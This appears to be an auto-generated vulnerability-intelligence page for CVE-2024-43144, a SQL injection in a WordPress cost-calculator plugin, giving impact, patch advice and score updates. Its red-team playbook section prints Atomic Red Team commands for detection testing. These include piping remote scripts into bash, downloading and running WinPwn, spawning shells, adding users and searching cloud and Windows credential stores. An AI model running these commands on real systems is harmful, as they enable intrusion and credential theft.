CVE-2024-43144
Overview
This vulnerability is a SQL Injection caused by improper neutralization of special elements in SQL commands within the StylemixThemes Cost Calculator Builder plugin. The root cause is insufficient escaping and lack of prepared statements for user-supplied input, specifically in the handling of discount codes. The affected component is the Cost Calculator Builder plugin for WordPress, versions up to and including 3.2.15.
Vulnerability Description
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in StylemixThemes Cost Calculator Builder allows SQL Injection.This issue affects Cost Calculator Builder: from n/a through 3.2.15.
Impact
An unauthenticated attacker can execute arbitrary SQL commands on the backend database by injecting malicious SQL through the discount code parameter. This can lead to unauthorized data extraction, data tampering, and partial denial of service due to database locking or delays. No user interaction or authentication is required to exploit this flaw, enabling remote attackers to compromise sensitive information stored in the database and potentially disrupt service availability.
Solution
Upgrade the StylemixThemes Cost Calculator Builder plugin to version 3.2.16 or later, where this SQL injection vulnerability has been addressed. Detailed patch instructions and advisories are available at Patchstack and Wordfence, specifically referencing the fix for the unauthenticated SQL injection issue in version 3.2.15. Users should apply the update promptly to mitigate the risk.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in StylemixThemes Cost Calculator Builder is rooted in improper handling of user input, specifically concerning SQL commands. This flaw allows an attacker to manipulate SQL queries executed by the application, leading to unauthorized data access or modification. The underlying issue stems from the failure to adequately sanitize input parameters, which can include special characters that are integral to SQL syntax. As a result, an attacker can inject malicious SQL code into the input fields, potentially allowing them to execute arbitrary SQL commands on the database. This can lead to severe consequences, including data leakage, data corruption, or even complete database takeover.
Attack vectors for this vulnerability are diverse and can be exploited in various scenarios. An attacker may target forms within the Cost Calculator Builder that accept user input, such as calculation parameters or configuration settings. By crafting a specially designed input string containing SQL commands, the attacker can manipulate the backend database. For instance, an attacker could inject commands to retrieve sensitive information, such as user credentials or financial data, or to alter records within the database. The ease of exploitation is exacerbated by the widespread use of this plugin in WordPress environments, where many installations may not have implemented adequate security measures.
The real-world impact of this vulnerability is significant, particularly for businesses relying on the affected plugin for their operations. Successful exploitation can lead to unauthorized access to sensitive customer data, which can result in legal repercussions, financial losses, and damage to reputation. Organizations may face compliance issues, especially if they handle personal identifiable information (PII) or financial data, as breaches can lead to hefty fines under regulations such as GDPR or PCI DSS. Additionally, the potential for data manipulation can disrupt business operations and erode customer trust, leading to long-term financial implications.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular security audits and vulnerability assessments can help identify instances of improper input handling before they are exploited. Web application firewalls (WAFs) can be employed to filter out malicious input, while intrusion detection systems (IDS) can monitor for suspicious activity indicative of SQL injection attempts. Furthermore, developers should adhere to secure coding practices, such as using prepared statements and parameterized queries, to prevent the execution of arbitrary SQL commands. Keeping the Cost Calculator Builder and associated WordPress installations updated is crucial, as updates often include security patches that address known vulnerabilities.
In conclusion, the vulnerability within StylemixThemes Cost Calculator Builder presents a critical risk to organizations utilizing this plugin. The potential for SQL injection attacks necessitates immediate attention from both developers and users. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare to defend against such threats. Implementing robust detection and mitigation strategies will not only protect sensitive data but also preserve the integrity and reputation of the business in an increasingly hostile cybersecurity landscape.
Recent telemetry from CSURFACE threat intelligence indicates a marked reduction in detection activity related to CVE-2024-43144, reflected in a downward adjustment of the CVSS score from 9.8 to 9.3 and a corresponding decrease in the Exploit Prediction Scoring System (EPSS) from 0.3382 to 0.2315. This decline suggests that active exploitation attempts against the StylemixThemes Cost Calculator Builder vulnerability have diminished, potentially due to increased awareness or patch adoption within affected environments. The EPSS score, while lower, remains in the 96th percentile, indicating that the vulnerability continues to pose a significant risk and should not be deprioritized. The stable seven-day EPSS trend further implies that the threat landscape has not recently intensified, and no new exploit techniques or proof-of-concept developments have emerged. For defenders, this updated risk profile underscores a tempered but persistent threat, emphasizing the importance of maintaining vigilance despite the reduction in observed exploitation. The recalibrated severity score aligns with this nuanced risk, reflecting a slightly moderated but still critical vulnerability posture.
Update 2 — June 09, 2026
The CVSS score for CVE-2024-43144 has been revised upward from 9.3 to 9.8, reflecting a reassessment of the vulnerability’s criticality within the StylemixThemes Cost Calculator Builder. This adjustment signals a heightened recognition of the potential impact and exploitability of the SQL injection flaw, despite the absence of new exploit techniques or proof-of-concept releases. CSURFACE threat intelligence notes that the EPSS score remains stable and high, indicating persistent risk without recent amplification in exploitation attempts. For defenders, this recalibration underscores the necessity to maintain stringent monitoring and patch management, as the vulnerability’s elevated severity score aligns with a critical threat posture that could facilitate significant data compromise or system manipulation if exploited. While the exploit landscape has not evolved with new vectors, the increased CVSS score suggests that the underlying risk factors—such as ease of exploitation or potential impact—have been reassessed to warrant greater urgency in mitigation efforts.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Stylemixthemes | Cost Calculator Builder | All |
cpe:2.3:a:stylemixthemes:cost_calculator_builder:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
1 eventsSighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-43144 |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/vulnerability/cost-calculator-builder/wordpress-cost-calculator-builder-plugin-3-2-15-sql-injection-vulnerability?_s_id=cve |